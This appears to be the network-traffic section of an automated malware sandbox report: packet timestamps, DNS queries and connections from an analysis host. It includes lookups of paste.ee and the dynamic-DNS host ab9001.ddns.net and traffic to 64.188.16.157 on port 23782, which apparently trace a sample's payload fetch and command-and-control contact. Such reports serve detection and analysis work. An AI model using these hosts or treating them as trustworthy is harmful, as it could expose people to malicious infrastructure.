                                                                                Oct 4, 2024 11:34:41.504475117 CEST55841443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.504503012 CEST4435584113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.504600048 CEST4435584113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.504657030 CEST55841443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.518970013 CEST55842443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.519009113 CEST4435584213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.519669056 CEST55842443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.519676924 CEST4435584213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.519967079 CEST55841443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.519992113 CEST4435584113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.520071030 CEST55841443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.520081043 CEST4435584113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.521796942 CEST55839443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.521796942 CEST55839443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.521828890 CEST4435583913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.521843910 CEST4435583913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.522667885 CEST55840443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.522677898 CEST4435584013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.522684097 CEST55840443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.522690058 CEST4435584013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.523641109 CEST55838443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.523659945 CEST4435583813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.523675919 CEST55838443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.523682117 CEST4435583813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.551270008 CEST55847443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.551310062 CEST4435584713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.551405907 CEST55847443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.552933931 CEST55848443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.552984953 CEST4435584813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.553042889 CEST55848443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.553503036 CEST55847443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.553517103 CEST4435584713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.554689884 CEST55849443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.554761887 CEST4435584913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.554903030 CEST55849443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.555042982 CEST55848443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.555058956 CEST4435584813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.555143118 CEST55849443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.555196047 CEST4435584913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.556749105 CEST55850443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.556776047 CEST4435585013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.556881905 CEST55850443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.557004929 CEST55850443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.557034016 CEST4435585013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.619154930 CEST4435584213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.619177103 CEST4435584213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.619240999 CEST4435584213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.619280100 CEST55842443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.619313955 CEST55842443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.619518995 CEST55842443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.619544029 CEST4435584213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.619556904 CEST55842443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.619565010 CEST4435584213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.626013041 CEST55851443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.626054049 CEST4435585113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.626137972 CEST55851443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.626385927 CEST55851443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:41.626399994 CEST4435585113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:41.957788944 CEST55855443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:41.957819939 CEST4435585513.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:41.957895994 CEST55855443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:41.958471060 CEST55855443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:41.958483934 CEST4435585513.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:41.960208893 CEST55856443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:41.960221052 CEST4435585613.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:41.960396051 CEST55856443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:41.960576057 CEST55856443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:41.960582972 CEST4435585613.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:42.192727089 CEST4435584713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.193295002 CEST4435585013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.214787006 CEST4435584913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.217334032 CEST4435584813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.220813990 CEST55847443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.220839024 CEST4435584713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.221343040 CEST55847443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.221347094 CEST4435584713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.221566916 CEST55850443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.221642971 CEST4435585013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.221900940 CEST55850443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.221916914 CEST4435585013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.221956968 CEST55849443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.221986055 CEST4435584913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.222127914 CEST55848443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.222151041 CEST4435584813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.222426891 CEST55848443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.222445965 CEST4435584813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.222469091 CEST55849443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.222481966 CEST4435584913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.259327888 CEST4435585113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.259931087 CEST55851443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.259958982 CEST4435585113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.260368109 CEST55851443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.260382891 CEST4435585113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.317845106 CEST4435584713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.317929029 CEST4435584713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:42.318016052 CEST55847443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.318254948 CEST55847443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:42.318265915 CEST4435584713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.142062902 CEST4435587113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.142141104 CEST55872443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.142141104 CEST55872443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.142165899 CEST4435587213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.151634932 CEST4435586713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.151695967 CEST4435586713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.151755095 CEST55867443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.151933908 CEST55867443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.151942015 CEST4435586713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.151992083 CEST55867443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.151997089 CEST4435586713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.155695915 CEST55873443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.155719042 CEST4435587313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.155788898 CEST55873443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.155939102 CEST4435586613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.155947924 CEST55873443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.155962944 CEST4435587313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.156002045 CEST4435586613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.156044960 CEST55866443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.156109095 CEST55866443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.156114101 CEST4435586613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.156125069 CEST55866443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.156128883 CEST4435586613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.158277035 CEST55874443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.158287048 CEST4435587413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.158341885 CEST55874443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.158449888 CEST55874443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.158459902 CEST4435587413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.770344019 CEST4435587013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.770883083 CEST55870443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.770910025 CEST4435587013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.771353006 CEST55870443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.771358013 CEST4435587013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.787189007 CEST4435587213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.787623882 CEST55872443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.787655115 CEST4435587213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.788109064 CEST55872443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.788116932 CEST4435587213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.789766073 CEST4435587313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.790035963 CEST55873443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.790064096 CEST4435587313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.790437937 CEST55873443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.790445089 CEST4435587313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.804088116 CEST4435587413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.804435968 CEST55874443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.804459095 CEST4435587413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.804975986 CEST55874443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.804981947 CEST4435587413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.871490955 CEST4435587013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.872442007 CEST4435587013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.872493029 CEST55870443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.872492075 CEST4435587013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.872560024 CEST55870443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.872603893 CEST55870443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.872627020 CEST4435587013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.872647047 CEST55870443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.872653961 CEST4435587013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.889034986 CEST4435587213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.889106989 CEST4435587213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.889307976 CEST55872443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.889440060 CEST55872443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.889458895 CEST4435587213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.889472961 CEST55872443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.889477968 CEST4435587213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.890579939 CEST4435587313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.890651941 CEST4435587313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.890717030 CEST55873443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.890867949 CEST55873443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.890885115 CEST4435587313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.890913010 CEST55873443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.890918970 CEST4435587313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.907923937 CEST4435587413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.907978058 CEST4435587413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.908044100 CEST55874443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.908227921 CEST55874443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.908238888 CEST4435587413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:44.908251047 CEST55874443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:44.908255100 CEST4435587413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:45.335406065 CEST4435587113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:45.436333895 CEST55871443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:45.815622091 CEST55871443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:45.815680981 CEST4435587113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:45.816328049 CEST55871443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:45.816344976 CEST4435587113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:46.216720104 CEST4435587113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:46.216828108 CEST4435587113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:46.216885090 CEST55871443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:46.230982065 CEST55871443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:46.230982065 CEST55871443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:46.230993986 CEST4435587113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:46.231003046 CEST4435587113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:47.334093094 CEST4435585513.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:47.334177971 CEST4435585513.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:47.334281921 CEST55855443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:47.342874050 CEST4435585613.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:47.342977047 CEST4435585613.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:47.344474077 CEST55856443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:47.355246067 CEST55856443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:47.355258942 CEST4435585613.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:47.355313063 CEST55855443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:47.355333090 CEST4435585513.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:51.269424915 CEST55897443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:51.269447088 CEST4435589713.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:51.269536018 CEST55897443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:51.272509098 CEST55898443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:51.272547007 CEST4435589813.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:51.272612095 CEST55898443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:51.272737980 CEST55897443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:51.272756100 CEST4435589713.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:51.273433924 CEST55898443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:51.273446083 CEST4435589813.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:51.910007000 CEST4435589813.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:51.910458088 CEST55898443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:51.910489082 CEST4435589813.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:51.911704063 CEST4435589813.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:51.912070036 CEST55898443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:51.912152052 CEST4435589813.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:51.947999954 CEST4435589713.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:51.948400974 CEST55897443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:51.948431015 CEST4435589713.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:51.948944092 CEST4435589713.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:51.949304104 CEST55897443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:51.949407101 CEST4435589713.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:52.074979067 CEST55898443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:52.136132002 CEST55897443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:56.639005899 CEST4435589813.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:56.639087915 CEST4435589813.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:56.639139891 CEST55898443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:56.664195061 CEST4435589713.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:56.664262056 CEST4435589713.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:56.664364100 CEST55897443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:56.786125898 CEST55898443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:56.786159039 CEST4435589813.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:56.786216021 CEST55897443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:56.786238909 CEST4435589713.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:59.069077015 CEST55918443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:59.069109917 CEST4435591813.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:59.069163084 CEST55918443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:59.069711924 CEST55918443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:59.069726944 CEST4435591813.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:59.071130037 CEST55919443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:59.071170092 CEST4435591913.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:59.071429014 CEST55919443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:59.071585894 CEST55919443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:59.071599960 CEST4435591913.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:59.536071062 CEST237825582164.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:34:59.536186934 CEST5582123782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:34:59.536276102 CEST5582123782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:34:59.541138887 CEST237825582164.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:34:59.877288103 CEST4435591913.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:59.878685951 CEST55919443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:59.878698111 CEST4435591913.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:59.879014969 CEST4435591913.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:59.879966974 CEST55919443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:59.880017042 CEST4435591913.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:59.923033953 CEST4435591813.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:59.924762964 CEST55918443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:59.924781084 CEST4435591813.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:59.925112009 CEST4435591813.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:59.925581932 CEST55918443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:59.925632954 CEST4435591813.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:59.949161053 CEST55919443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:35:00.107676029 CEST55918443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:35:00.555010080 CEST5592423782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:00.559971094 CEST237825592464.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:35:00.562509060 CEST5592423782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:00.568137884 CEST5592423782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:35:00.572930098 CEST237825592464.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:35:02.094461918 CEST55930443192.168.2.5142.250.184.196
                                                                                Oct 4, 2024 11:35:02.094487906 CEST44355930142.250.184.196192.168.2.5
                                                                                Oct 4, 2024 11:35:02.094552040 CEST55930443192.168.2.5142.250.184.196
                                                                                Oct 4, 2024 11:35:02.094795942 CEST55930443192.168.2.5142.250.184.196
                                                                                Oct 4, 2024 11:35:02.094808102 CEST44355930142.250.184.196192.168.2.5
                                                                                Oct 4, 2024 11:35:02.725481033 CEST44355930142.250.184.196192.168.2.5
                                                                                Oct 4, 2024 11:35:02.727103949 CEST55930443192.168.2.5142.250.184.196
                                                                                Oct 4, 2024 11:35:02.727130890 CEST44355930142.250.184.196192.168.2.5
                                                                                Oct 4, 2024 11:35:02.727488041 CEST44355930142.250.184.196192.168.2.5
                                                                                Oct 4, 2024 11:35:02.728023052 CEST55930443192.168.2.5142.250.184.196
                                                                                Oct 4, 2024 11:35:02.728082895 CEST44355930142.250.184.196192.168.2.5
                                                                                Oct 4, 2024 11:35:02.935410976 CEST44355930142.250.184.196192.168.2.5
                                                                                Oct 4, 2024 11:35:02.935645103 CEST55930443192.168.2.5142.250.184.196
                                                                                Oct 4, 2024 11:35:04.604496956 CEST4435591913.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:35:04.604578972 CEST4435591913.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:35:04.604625940 CEST55919443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:35:04.634809971 CEST4435591813.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:35:04.634994030 CEST4435591813.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:35:04.635046005 CEST55918443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:35:04.695419073 CEST55919443192.168.2.513.107.246.44
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 4, 2024 11:33:48.202822924 CEST6249753192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:33:48.210391998 CEST53624971.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:51.286885023 CEST4919753192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:33:51.296185970 CEST53491971.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:52.692913055 CEST53547531.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:52.968610048 CEST5927453192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:33:52.977555990 CEST53592741.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:58.038075924 CEST53544461.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:58.043220043 CEST53636011.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:33:59.556103945 CEST53556771.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:01.496284008 CEST5111153192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:01.496521950 CEST5289253192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:02.044235945 CEST6523153192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:02.044677019 CEST5067153192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:03.039217949 CEST53506711.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:03.039231062 CEST53652311.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:07.155858994 CEST6443553192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:07.156267881 CEST6530753192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:07.341641903 CEST53506961.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:09.539875031 CEST5080953192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:09.540160894 CEST5556053192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:34:16.864934921 CEST53544701.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:35.832654953 CEST53491571.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:57.443927050 CEST53562401.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:34:58.777283907 CEST53619201.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:35:00.543437004 CEST5680253192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:35:00.553200960 CEST53568021.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:35:02.549645901 CEST5385753192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:35:02.549782991 CEST6500753192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:35:27.048477888 CEST53611431.1.1.1192.168.2.5
                                                                                Oct 4, 2024 11:35:42.157587051 CEST5518953192.168.2.51.1.1.1
                                                                                Oct 4, 2024 11:35:42.166039944 CEST53551891.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Oct 4, 2024 11:34:20.314686060 CEST | 192.168.2.5 | 1.1.1.1 | c265 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 4, 2024 11:33:48.202822924 CEST | 192.168.2.5 | 1.1.1.1 | 0x89c4 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:33:51.286885023 CEST | 192.168.2.5 | 1.1.1.1 | 0xead8 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:33:52.968610048 CEST | 192.168.2.5 | 1.1.1.1 | 0xc470 | Standard query (0) | ab9001.ddns.net | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:34:01.496284008 CEST | 192.168.2.5 | 1.1.1.1 | 0x1e7d | Standard query (0) | js.monitor.azure.com | A (IP address) | IN (0x0001) | false
